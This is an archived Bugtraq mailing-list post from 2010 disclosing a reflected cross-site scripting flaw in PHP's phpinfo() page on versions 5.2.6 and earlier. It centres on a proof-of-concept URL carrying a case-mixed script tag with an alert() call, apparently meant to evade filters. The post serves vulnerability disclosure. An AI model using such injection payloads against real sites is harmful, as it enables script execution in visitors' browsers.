Bugtraq mailing list archives
phpinfo() XSS Vulnerability
From: info () securitylab ir
Date: 6 Mar 2010 11:03:45 -0000
################################################################### # Securitylab.ir ################################################################# # Note: The above code in php 5.2.6 and lower test is successful ################################################################# Vulnerability: http://site.com/phpinfo.php?+<ScRipT>alert(0111001101100101011000110111010101110010011010010111010001111001);</sCrIpT>+ ################################################################# # Discoverd By: Pouya Daneshmand # Website: http://securitylab.ir # Contacts: info[at]securitylab.ir & whh_iran () yahoo com ###################################################################
Current thread:
- phpinfo() XSS Vulnerability info (Mar 08)
- Re: phpinfo() XSS Vulnerability Salvatore Fresta aka Drosophila (Mar 08)